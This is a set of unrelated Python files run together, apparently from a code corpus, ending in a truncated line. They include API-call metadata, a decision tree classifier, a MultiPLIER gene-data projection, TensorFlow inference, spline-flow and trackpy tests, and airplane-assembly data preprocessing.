[((1218, 1274), 'pandas.Series', 'pd.Series', (['[6.0, 7.0, 8.0, 9.0, 10.0]'], {'name': '"""wind_speed"""'}), "([6.0, 7.0, 8.0, 9.0, 10.0], name='wind_speed')\n", (1227, 1274), True, 'import pandas as pd\n'), ((1344, 1473), 'pandas.Series', 'pd.Series', (['[1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503]'], {'name': '"""value"""'}), "([1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503], name='value')\n", (1353, 1473), True, 'import pandas as pd\n'), ((1651, 1670), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (1660, 1670), True, 'import numpy as np\n'), ((1926, 2054), 'pandas.Series', 'pd.Series', (['[929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625]'], {'name': '"""value"""'}), "([929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625], name='value')\n", (1935, 2054), True, 'import pandas as pd\n'), ((2232, 2251), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (2241, 2251), True, 'import numpy as np\n'), ((607, 642), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (621, 642), True, 'import windpowerlib.wind_turbine as wt\n'), ((944, 969), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (957, 969), False, 'import pytest\n'), ((1060, 1092), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1078, 1092), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2421, 2446), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2434, 2446), False, 'import pytest\n'), ((2527, 2559), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2545, 2559), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2629, 2664), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (2643, 2664), True, 'import windpowerlib.wind_turbine as wt\n'), ((3057, 3097), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3083, 3097), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3949, 3989), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3975, 3989), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((4116, 4140), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (4129, 4140), False, 'import pytest\n'), ((4205, 4245), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (4231, 4245), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((1541, 1601), 'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (1550, 1601), True, 'import pandas as pd\n'), ((1698, 1730), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1716, 1730), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2135, 2195), 'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (2144, 2195), True, 'import pandas as pd\n'), ((2279, 2311), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2297, 2311), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3313, 3477), 'pandas.Series', 'pd.Series', (['[1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, 0.89, 0.92,\n 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, \n 0.89, 0.92, 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, \n 1.0, 1.0])\n', (3322, 3477), True, 'import pandas as pd\n'), ((3268, 3287), 'numpy.arange', 'np.arange', (['(1)', '(26)', '(1)'], {}), '(1, 26, 1)\n', (3277, 3287), True, 'import numpy as np\n')]
import numpy as np # Was told built-in libraries are acceptable. from collections import Counter class Node: def __init__(self, left=None, right=None, best_feature=None, threshold=None, value=None): self.left = left self.right = right self.best_feature = best_feature self.threshold = threshold self.value = value def is_node_leaf(self): """Determines if node is a leaf node.""" return self.value is not None class Classifier: def __init__(self, max_depth=5): self.root = None self.max_depth = max_depth def fit(self, X, y): self.root = self._make_split(X, y) return self def predict(self, X): """Makes prediction by traversing down our decision tree.""" return np.array(([self._make_prediction(feature, self.root) for feature in X])) def _make_split(self, X, y, depth=0): # Set our number of features according to feature input shape. num_features = X.shape[1] num_labels = len(np.unique(y)) # How many unique labels? # Check if base case is met: # Maximum depth has been reached or only one label if depth >= self.max_depth or num_labels == 1: leaf_value = self._most_common(y) return Node(value=leaf_value) # Create leaf node if so. # Select trandom indices random_features = np.random.choice(num_features, num_features, replace=False) # Use greedy search to find our best available split. best_feature, threshold = self._find_best(X, y, random_features) # Determine left and right indices. left_idx, right_idx = self._what_splits(X[:, best_feature], threshold) # Recursively make splits until base case met; change depth. left = self._make_split(X[left_idx, :], y[left_idx], depth+1) right = self._make_split(X[right_idx, :], y[right_idx], depth+1) return Node(left, right, best_feature, threshold) def _find_best(self, X, y, feature_indices): # Define default values for best gain, index, and threshold. best_gain = -1 split_index = None split_threshold = None # Iterate through list of feature indices. for index in feature_indices: # Set the selected column X_column = X[:, index] thresholds = np.unique(X_column) # Determine unique values. for threshold in thresholds: # Iterate through and calculate the information gain. gain = self._calculate_information_gain(X_column, y, threshold) # Figure out the best gain, define the split index/threshold if # the current gain is greater than our best gain, and define it # as our new best gain. if gain > best_gain: best_gain = gain split_index = index split_threshold = threshold return split_index, split_threshold def _what_splits(self, X, split_threshold): # Split should be left if X <= our threshold. left = np.argwhere(X <= split_threshold).flatten() # Split should be right if X > our threshold. right = np.argwhere(X > split_threshold).flatten() return left, right def _calculate_entropy(self, y): histo = np.bincount(y) # Counts occurence of each element ps = histo / len(y) # List comprehension; calculate entropy. return -np.sum([p * np.log2(p) for p in ps if p > 0]) def _calculate_information_gain(self, X, y, split_threshold): # Calculate entropy of the parent parent_entropy = self._calculate_entropy(y) # Determine the left and right values. left, right = self._what_splits(X, split_threshold) # Confirm there's information gain. if len(left) == 0 or len(right) == 0: return 0 # For calculation of weighted average. num = len(y) num_left, num_right = len(left), len(right) # Calculate the entropy for the left side, as well as the right. entropy_left = self._calculate_entropy(y[left]) entropy_right = self._calculate_entropy(y[right]) # Determine the weighted average of the entropy of our children. child_entropy = ((num_left/num) * entropy_left + (num_right/num) * entropy_right) # Subtract this entropy from our parent to get our information gain. information_gain = parent_entropy - child_entropy return information_gain def _most_common(self, y): counter = Counter(y) most_common = counter.most_common(1)[0][0] return most_common def _make_prediction(self, X, node): # Check if the node is a leaf. If it is, return its value. if node.is_node_leaf(): return node.value # Otherwise, traverse down the decision tree. if X[node.best_feature] <= node.threshold: return self._make_prediction(X, node.left) else: return self._make_prediction(X, node.right)
[ "numpy.log2", "numpy.random.choice", "numpy.argwhere", "collections.Counter", "numpy.bincount", "numpy.unique" ]
[((1449, 1508), 'numpy.random.choice', 'np.random.choice', (['num_features', 'num_features'], {'replace': '(False)'}), '(num_features, num_features, replace=False)\n', (1465, 1508), True, 'import numpy as np\n'), ((3475, 3489), 'numpy.bincount', 'np.bincount', (['y'], {}), '(y)\n', (3486, 3489), True, 'import numpy as np\n'), ((4761, 4771), 'collections.Counter', 'Counter', (['y'], {}), '(y)\n', (4768, 4771), False, 'from collections import Counter\n'), ((1082, 1094), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (1091, 1094), True, 'import numpy as np\n'), ((2471, 2490), 'numpy.unique', 'np.unique', (['X_column'], {}), '(X_column)\n', (2480, 2490), True, 'import numpy as np\n'), ((3237, 3270), 'numpy.argwhere', 'np.argwhere', (['(X <= split_threshold)'], {}), '(X <= split_threshold)\n', (3248, 3270), True, 'import numpy as np\n'), ((3351, 3383), 'numpy.argwhere', 'np.argwhere', (['(X > split_threshold)'], {}), '(X > split_threshold)\n', (3362, 3383), True, 'import numpy as np\n'), ((3631, 3641), 'numpy.log2', 'np.log2', (['p'], {}), '(p)\n', (3638, 3641), True, 'import numpy as np\n')]
""" Classes and code with MultiPLIER related functionality. """ import conf import numpy as np import pandas as pd class MultiplierProjection(object): """Projects new data into the MultiPLIER latent space.""" def __init__(self): pass def transform( self, y: pd.DataFrame, multiplier_compatible: bool = True, ) -> pd.DataFrame: """Projects a gene dataset into the MultiPLIER model. This code is a reimplementation in Python of the function GetNewDataB (https://github.com/greenelab/multi-plier/blob/v0.2.0/util/plier_util.R), more suitable and convenient for the PhenoPLIER project (almost entirely written in Python). It basically row-normalizes (z-score) the given dataset, keeps only the genes in common with the MultiPLIER model, and adds the missing ones as zeros (mean). Args: y: The new data to be projected. Gene symbols are expected in rows. The columns could be conditions/samples, but in the PhenoPLIER context they could also be traits/diseases or perturbations (Connectivity Map). multiplier_compatible: If True, it will try to be fully compatible with the GetNewDataB function in some situations (for instance, if the new data contains NaNs). Returns: A pandas.DataFrame with the projection of the input data into the MultiPLIER latent space. The latent variables of the MultiPLIER model are in rows, and the columns are those of the input data (conditions, traits, drugs, etc). """ z = self._read_model_z() metadata = self._read_model_metadata() # nothing special is done if the input data contains NaNs, but it will # raise a warning for the user. if y.isna().any().any(): import warnings warnings.warn("Input data contains NaN values.") # if multiplier_compatible, just mimic the same behavior of function # GetNewDataB and return a DataFrame of NaN values. if multiplier_compatible: return pd.DataFrame( data=np.nan, index=z.columns.copy(), columns=y.columns.copy(), ) # if given data has Ensembl ID genes, then convert z genes to that if y.index[0].startswith("ENSG"): from entity import Gene z = z.rename(index=Gene.GENE_NAME_TO_ID_MAP) # row-standardize the data with z-score y_std = y.sub(y.mean(1), axis=0).div(y.std(1), axis=0) model_genes = z.index data_genes = y_std.index common_genes = model_genes.intersection(data_genes) # select from input data only genes in common with model, and add missing ones # as zeros (mean). y_std = y_std.loc[common_genes].append( pd.DataFrame( 0, index=model_genes.difference(data_genes), columns=y_std.columns.copy(), ) ) # get the precision matrix of gene loadings (z matrix) z_cov_inv = pd.DataFrame( data=np.linalg.pinv(z.T.dot(z) + metadata["L2"] * np.identity(z.shape[1])), index=z.columns.copy(), columns=z.columns.copy(), ) # perform final matrix multiplication: (z^T z + l2 I)^{-1} z^T Y return z_cov_inv.dot(z.T).dot(y_std) @staticmethod def _read_model_z(): """Returns the MultiPLIER Z matrix (gene loadings).""" return pd.read_pickle(conf.MULTIPLIER["MODEL_Z_MATRIX_FILE"]) @staticmethod def _read_model_metadata(): """Returns metadata of the MultiPLIER model.""" return pd.read_pickle(conf.MULTIPLIER["MODEL_METADATA_FILE"])
[ "pandas.read_pickle", "warnings.warn", "numpy.identity" ]
[((3704, 3758), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_Z_MATRIX_FILE']"], {}), "(conf.MULTIPLIER['MODEL_Z_MATRIX_FILE'])\n", (3718, 3758), True, 'import pandas as pd\n'), ((3881, 3935), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_METADATA_FILE']"], {}), "(conf.MULTIPLIER['MODEL_METADATA_FILE'])\n", (3895, 3935), True, 'import pandas as pd\n'), ((1998, 2046), 'warnings.warn', 'warnings.warn', (['"""Input data contains NaN values."""'], {}), "('Input data contains NaN values.')\n", (2011, 2046), False, 'import warnings\n'), ((3353, 3376), 'numpy.identity', 'np.identity', (['z.shape[1]'], {}), '(z.shape[1])\n', (3364, 3376), True, 'import numpy as np\n')]
import numpy as np def softmax(a): return np.exp(a) / np.sum(np.exp(a)) input_a = np.array([-3, -1.5, 0.3, 0.6, 1, 1.8, 3]) print(np.round(softmax(input_a), 3))
[ "numpy.array", "numpy.exp" ]
[((88, 129), 'numpy.array', 'np.array', (['[-3, -1.5, 0.3, 0.6, 1, 1.8, 3]'], {}), '([-3, -1.5, 0.3, 0.6, 1, 1.8, 3])\n', (96, 129), True, 'import numpy as np\n'), ((47, 56), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (53, 56), True, 'import numpy as np\n'), ((66, 75), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (72, 75), True, 'import numpy as np\n')]
import tensorflow as tf import numpy as np import scipy.io as scio import os import sys import random import network import math CATEGORY_NAME = ['Backpack', 'Basket', 'Bathtub', 'Bed', 'Bench', 'Bicycle', 'Bowl', 'Chair', 'Cup', 'Desk', 'DryingRack', 'Handcart', 'Hanger', 'Hook', 'Lamp', 'Laptop', 'Shelf', 'Sink', 'Sofa', 'Stand', 'Stool', 'Stroller', 'Table', 'Tvbench', 'Vase'] FUNC_LABEL_NUM = 18 BATCH_SIZE = 1 MODEL = '../../Model/iSEG/full/model.ckpt' DATA_IO = '../../DATA/label/labelMat' DATA_SCE = '../../Output/iGEN/full/gen' TEST_FILE = '../../DATA/cvlist/test_0.txt' OUTPUT_FILE = '../../Output/iSEG/full' if not os.path.exists(OUTPUT_FILE+'/'): os.makedirs(OUTPUT_FILE+'/') cate_label_idx_list = scio.loadmat('../../DATA/label/interactionLabel.mat') cate_label_idx_list = np.squeeze(cate_label_idx_list['categoryLabelIdx']) # add noise def dataAug(input, weight = 1.0): dim = input.shape[0] c = input.shape[-1] data = np.random.rand(dim,dim,dim,c) out = data + input * weight f_s = np.sum(out, axis=-1, keepdims=True) return out/f_s print("Loading data...") dataSce = {} dataBinary = {} for model in os.listdir(DATA_SCE): data = scio.loadmat(DATA_SCE + '/' + model) data = data['instances'] data = np.reshape(data.data, [64,64,64,3]) dataSce[model] = data data = np.argmax(data,-1) binaryData = np.zeros((64,64,64,2)) free = np.zeros((64,64,64)) central = np.zeros((64,64,64)) free[data==2]=1 central[data==0]=1 binaryData[:,:,:,0] = central binaryData[:,:,:,1] = free dataBinary[model] = binaryData testList = [] f = open(TEST_FILE) lines = f.readlines() for line in lines: model_x = line.split('\n')[0]+'_rec_sce_4seg.mat' temp = np.zeros(25,dtype=np.int32) label = line.split('_')[0] label_idx_list = [] label_idx = np.zeros(FUNC_LABEL_NUM+2,dtype=np.int32) for i in range(25): if CATEGORY_NAME[i] == label: temp[i] = 1 label_idx_list = np.squeeze(cate_label_idx_list[i]) break if label == 'Backpack': label_idx_list = [1] for idx in label_idx_list: label_idx[idx] = 1 label_idx[0] = 1 label_idx[-1] = 1 testList.append([model_x,temp,label_idx]) f.close() print("dataSce loaded") # setup network iSEG = network.iSEG(BATCH_SIZE) sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True))) tf.global_variables_initializer().run() model_ckpt = MODEL + '.index' print(MODEL) if os.path.isfile(model_ckpt): print('model.ckpt file found') else: print('model file not found, quit.') exit() saver = tf.train.Saver() saver.restore(sess, MODEL) print('Model restored') x = np.random.rand(BATCH_SIZE, 64, 64, 64, 3) x_binary = np.random.rand(BATCH_SIZE, 64, 64, 64, 2) label = np.random.rand(BATCH_SIZE, 25) label_idx = np.random.rand(BATCH_SIZE, FUNC_LABEL_NUM + 2) for i in range(len(testList)): model_x, label_, label_idx_ = testList[i] x[0, :, :, :, :] = dataSce[model_x] x_binary[0, :, :, :, :] = dataBinary[model_x] label[0] = label_ label_idx[0] = label_idx_ result = sess.run([iSEG.x_rec], feed_dict = {iSEG.x: x, iSEG.x_binary:x_binary, iSEG.label:label}) result = np.reshape(result, [64, 64, 64, FUNC_LABEL_NUM + 2]) # for refine # if not os.path.exists(OUTPUT_FILE+'/refine/'): # os.makedirs(OUTPUT_FILE+'/refine/') # scio.savemat(OUTPUT_FILE+'/refine/'+model_x[0:-4]+'_label_refine.mat', {'instances':result}) # for visual label_sce = np.argmax(result,-1)+1 label_max = np.amax(label_sce) label_sce[label_sce==label_max] = 0 if not os.path.exists(OUTPUT_FILE + '/visual/'): os.makedirs(OUTPUT_FILE + '/visual/') scio.savemat(OUTPUT_FILE + '/visual/'+model_x[0:-4] + '_label.mat', {'instances':label_sce.astype(np.int8)})
[ "numpy.sum", "os.makedirs", "tensorflow.train.Saver", "scipy.io.loadmat", "numpy.random.rand", "numpy.argmax", "network.iSEG", "tensorflow.global_variables_initializer", "os.path.exists", "numpy.zeros", "numpy.amax", "os.path.isfile", "numpy.reshape", "numpy.squeeze", "tensorflow.GPUOptions", "os.listdir" ]
[((725, 778), 'scipy.io.loadmat', 'scio.loadmat', (['"""../../DATA/label/interactionLabel.mat"""'], {}), "('../../DATA/label/interactionLabel.mat')\n", (737, 778), True, 'import scipy.io as scio\n'), ((801, 852), 'numpy.squeeze', 'np.squeeze', (["cate_label_idx_list['categoryLabelIdx']"], {}), "(cate_label_idx_list['categoryLabelIdx'])\n", (811, 852), True, 'import numpy as np\n'), ((1138, 1158), 'os.listdir', 'os.listdir', (['DATA_SCE'], {}), '(DATA_SCE)\n', (1148, 1158), False, 'import os\n'), ((2186, 2210), 'network.iSEG', 'network.iSEG', (['BATCH_SIZE'], {}), '(BATCH_SIZE)\n', (2198, 2210), False, 'import network\n'), ((2396, 2422), 'os.path.isfile', 'os.path.isfile', (['model_ckpt'], {}), '(model_ckpt)\n', (2410, 2422), False, 'import os\n'), ((2525, 2541), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2539, 2541), True, 'import tensorflow as tf\n'), ((2598, 2639), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(3)'], {}), '(BATCH_SIZE, 64, 64, 64, 3)\n', (2612, 2639), True, 'import numpy as np\n'), ((2651, 2692), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(2)'], {}), '(BATCH_SIZE, 64, 64, 64, 2)\n', (2665, 2692), True, 'import numpy as np\n'), ((2701, 2731), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(25)'], {}), '(BATCH_SIZE, 25)\n', (2715, 2731), True, 'import numpy as np\n'), ((2744, 2790), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(FUNC_LABEL_NUM + 2)'], {}), '(BATCH_SIZE, FUNC_LABEL_NUM + 2)\n', (2758, 2790), True, 'import numpy as np\n'), ((639, 672), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (653, 672), False, 'import os\n'), ((673, 703), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (684, 703), False, 'import os\n'), ((951, 983), 'numpy.random.rand', 'np.random.rand', (['dim', 'dim', 'dim', 'c'], {}), '(dim, dim, dim, c)\n', (965, 983), True, 'import numpy as np\n'), ((1018, 1053), 'numpy.sum', 'np.sum', (['out'], {'axis': '(-1)', 'keepdims': '(True)'}), '(out, axis=-1, keepdims=True)\n', (1024, 1053), True, 'import numpy as np\n'), ((1168, 1204), 'scipy.io.loadmat', 'scio.loadmat', (["(DATA_SCE + '/' + model)"], {}), "(DATA_SCE + '/' + model)\n", (1180, 1204), True, 'import scipy.io as scio\n'), ((1239, 1277), 'numpy.reshape', 'np.reshape', (['data.data', '[64, 64, 64, 3]'], {}), '(data.data, [64, 64, 64, 3])\n', (1249, 1277), True, 'import numpy as np\n'), ((1307, 1326), 'numpy.argmax', 'np.argmax', (['data', '(-1)'], {}), '(data, -1)\n', (1316, 1326), True, 'import numpy as np\n'), ((1340, 1365), 'numpy.zeros', 'np.zeros', (['(64, 64, 64, 2)'], {}), '((64, 64, 64, 2))\n', (1348, 1365), True, 'import numpy as np\n'), ((1371, 1393), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1379, 1393), True, 'import numpy as np\n'), ((1403, 1425), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1411, 1425), True, 'import numpy as np\n'), ((1687, 1715), 'numpy.zeros', 'np.zeros', (['(25)'], {'dtype': 'np.int32'}), '(25, dtype=np.int32)\n', (1695, 1715), True, 'import numpy as np\n'), ((1777, 1821), 'numpy.zeros', 'np.zeros', (['(FUNC_LABEL_NUM + 2)'], {'dtype': 'np.int32'}), '(FUNC_LABEL_NUM + 2, dtype=np.int32)\n', (1785, 1821), True, 'import numpy as np\n'), ((3105, 3157), 'numpy.reshape', 'np.reshape', (['result', '[64, 64, 64, FUNC_LABEL_NUM + 2]'], {}), '(result, [64, 64, 64, FUNC_LABEL_NUM + 2])\n', (3115, 3157), True, 'import numpy as np\n'), ((3426, 3444), 'numpy.amax', 'np.amax', (['label_sce'], {}), '(label_sce)\n', (3433, 3444), True, 'import numpy as np\n'), ((2309, 2342), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2340, 2342), True, 'import tensorflow as tf\n'), ((3390, 3411), 'numpy.argmax', 'np.argmax', (['result', '(-1)'], {}), '(result, -1)\n', (3399, 3411), True, 'import numpy as np\n'), ((3490, 3530), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3504, 3530), False, 'import os\n'), ((3534, 3571), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3545, 3571), False, 'import os\n'), ((1907, 1941), 'numpy.squeeze', 'np.squeeze', (['cate_label_idx_list[i]'], {}), '(cate_label_idx_list[i])\n', (1917, 1941), True, 'import numpy as np\n'), ((2274, 2306), 'tensorflow.GPUOptions', 'tf.GPUOptions', ([], {'allow_growth': '(True)'}), '(allow_growth=True)\n', (2287, 2306), True, 'import tensorflow as tf\n')]
# -*- coding: utf-8 -*- """ Tests for neural spline flows. """ import numpy as np import pytest import torch from glasflow.flows import CouplingNSF @pytest.mark.parametrize("num_bins", [4, 10]) def test_coupling_nsf_init(num_bins): """Test the initialise method""" CouplingNSF(2, 2, num_bins=num_bins) @pytest.mark.integration_test def test_coupling_nsf_forward_inverse(): """Make sure the flow is invertible""" x = torch.randn(10, 2) flow = CouplingNSF(2, 2) with torch.no_grad(): x_prime, log_prob = flow.forward(x) x_out, log_prob_inv = flow.inverse(x_prime) np.testing.assert_array_almost_equal(x, x_out) np.testing.assert_array_almost_equal(log_prob, -log_prob_inv)
[ "torch.randn", "glasflow.flows.CouplingNSF", "pytest.mark.parametrize", "numpy.testing.assert_array_almost_equal", "torch.no_grad" ]
[((152, 196), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""num_bins"""', '[4, 10]'], {}), "('num_bins', [4, 10])\n", (175, 196), False, 'import pytest\n'), ((276, 312), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {'num_bins': 'num_bins'}), '(2, 2, num_bins=num_bins)\n', (287, 312), False, 'from glasflow.flows import CouplingNSF\n'), ((437, 455), 'torch.randn', 'torch.randn', (['(10)', '(2)'], {}), '(10, 2)\n', (448, 455), False, 'import torch\n'), ((467, 484), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {}), '(2, 2)\n', (478, 484), False, 'from glasflow.flows import CouplingNSF\n'), ((613, 659), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['x', 'x_out'], {}), '(x, x_out)\n', (649, 659), True, 'import numpy as np\n'), ((664, 725), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['log_prob', '(-log_prob_inv)'], {}), '(log_prob, -log_prob_inv)\n', (700, 725), True, 'import numpy as np\n'), ((495, 510), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (508, 510), False, 'import torch\n')]
import numpy as np import pandas as pd import pytest from locan import LocData from locan.dependencies import HAS_DEPENDENCY if HAS_DEPENDENCY["trackpy"]: from trackpy import quiet as tp_quiet from locan.data.tracking import link_locdata, track pytestmark = pytest.mark.skipif( not HAS_DEPENDENCY["trackpy"], reason="requires trackpy" ) if HAS_DEPENDENCY["trackpy"]: tp_quiet() # same as: trackpy.logger.setLevel(logging.WARN) @pytest.fixture() def locdata_simple(): dict_ = { "position_x": [0, 1, 2, 10, 20, 21, 30, 4], "position_y": [0, 1, 2, 10, 20, 21, 30, 4], "position_z": [0, 1, 2, 10, 20, 21, 30, 4], "frame": np.arange(8), } return LocData(dataframe=pd.DataFrame.from_dict(dict_)) def test_link_locdata(locdata_simple): track_series = link_locdata(locdata_simple, search_range=5, memory=0) assert len(track_series) == 8 assert track_series.name == "track" def test_track(locdata_simple): locdata_new, track_series = track(locdata_simple, search_range=5) # print(locdata_new.data) assert "frame" in locdata_new.data.columns assert len(locdata_new) == 5 locdata_new, track_series = track(locdata_simple, search_range=5, memory=5) # print(locdata_new.data) assert len(locdata_new) == 4
[ "pandas.DataFrame.from_dict", "trackpy.quiet", "pytest.fixture", "pytest.mark.skipif", "numpy.arange", "locan.data.tracking.link_locdata", "locan.data.tracking.track" ]
[((271, 347), 'pytest.mark.skipif', 'pytest.mark.skipif', (["(not HAS_DEPENDENCY['trackpy'])"], {'reason': '"""requires trackpy"""'}), "(not HAS_DEPENDENCY['trackpy'], reason='requires trackpy')\n", (289, 347), False, 'import pytest\n'), ((453, 469), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (467, 469), False, 'import pytest\n'), ((389, 399), 'trackpy.quiet', 'tp_quiet', ([], {}), '()\n', (397, 399), True, 'from trackpy import quiet as tp_quiet\n'), ((819, 873), 'locan.data.tracking.link_locdata', 'link_locdata', (['locdata_simple'], {'search_range': '(5)', 'memory': '(0)'}), '(locdata_simple, search_range=5, memory=0)\n', (831, 873), False, 'from locan.data.tracking import link_locdata, track\n'), ((1014, 1051), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)'}), '(locdata_simple, search_range=5)\n', (1019, 1051), False, 'from locan.data.tracking import link_locdata, track\n'), ((1194, 1241), 'locan.data.tracking.track', 'track', (['locdata_simple'], {'search_range': '(5)', 'memory': '(5)'}), '(locdata_simple, search_range=5, memory=5)\n', (1199, 1241), False, 'from locan.data.tracking import link_locdata, track\n'), ((679, 691), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (688, 691), True, 'import numpy as np\n'), ((728, 757), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dict_'], {}), '(dict_)\n', (750, 757), True, 'import pandas as pd\n')]
import os import logging import glob import yaml import joblib import numpy as np from mathtools import utils from kinemparse import airplanecorpus logger = logging.getLogger(__name__) def makeBinLabels(action_labels, part_idxs_to_bins, num_samples): no_bin = part_idxs_to_bins[0] # 0 is the index of the null part bin_labels = np.full(num_samples, no_bin, dtype=int) for part_index, start_index, end_index in action_labels: bin_index = part_idxs_to_bins[part_index] bin_labels[start_index:end_index + 1] = bin_index return bin_labels def main( out_dir=None, hand_detections_dir=None, labels_dir=None, plot_output=None, results_file=None, sweep_param_name=None): hand_detections_dir = os.path.expanduser(hand_detections_dir) labels_dir = os.path.expanduser(labels_dir) out_dir = os.path.expanduser(out_dir) if not os.path.exists(out_dir): os.makedirs(out_dir) out_data_dir = os.path.join(out_dir, 'data') if not os.path.exists(out_data_dir): os.makedirs(out_data_dir) fig_dir = os.path.join(out_dir, 'figures') if not os.path.exists(fig_dir): os.makedirs(fig_dir) def saveVariable(var, var_name): joblib.dump(var, os.path.join(out_data_dir, f'{var_name}.pkl')) logger = utils.setupRootLogger(filename=os.path.join(out_dir, 'log.txt')) logger.info(f"Reading from: {hand_detections_dir}") logger.info(f"Writing to: {out_dir}") if results_file is None: results_file = os.path.join(out_dir, 'results.csv') # write_mode = 'w' else: results_file = os.path.expanduser(results_file) # write_mode = 'a' fig_dir = os.path.join(out_dir, 'figures') if not os.path.exists(fig_dir): os.makedirs(fig_dir) out_data_dir = os.path.join(out_dir, 'data') if not os.path.exists(out_data_dir): os.makedirs(out_data_dir) part_names, part_names_to_idxs, part_idxs_to_bins = airplanecorpus.loadParts() for i, fn in enumerate(glob.glob(os.path.join(hand_detections_dir, '*.txt'))): video_id = utils.stripExtension(fn).split('.handsdetections')[0] logger.info(f"Processing video {video_id}") hand_detections = airplanecorpus.loadHandDetections( video_id, dir_name=hand_detections_dir, unflatten=True ) hand_detections = hand_detections.reshape(hand_detections.shape[0], -1) mean_detection = np.nanmean(hand_detections) hand_detections[np.isnan(hand_detections)] = mean_detection action_labels = airplanecorpus.loadLabels( video_id, dir_name=labels_dir, part_names_to_idxs=part_names_to_idxs ) bin_labels = makeBinLabels(action_labels, part_idxs_to_bins, hand_detections.shape[0]) fig_fn = os.path.join(fig_dir, f"{video_id}.png") utils.plot_array(hand_detections.T, (bin_labels,), ('bin',), fn=fig_fn) video_id = video_id.replace('_', '-') saveVariable(hand_detections, f'trial={video_id}_feature-seq') saveVariable(bin_labels, f'trial={video_id}_label-seq') if __name__ == "__main__": # Parse command-line args and config file cl_args = utils.parse_args(main) config, config_fn = utils.parse_config(cl_args, 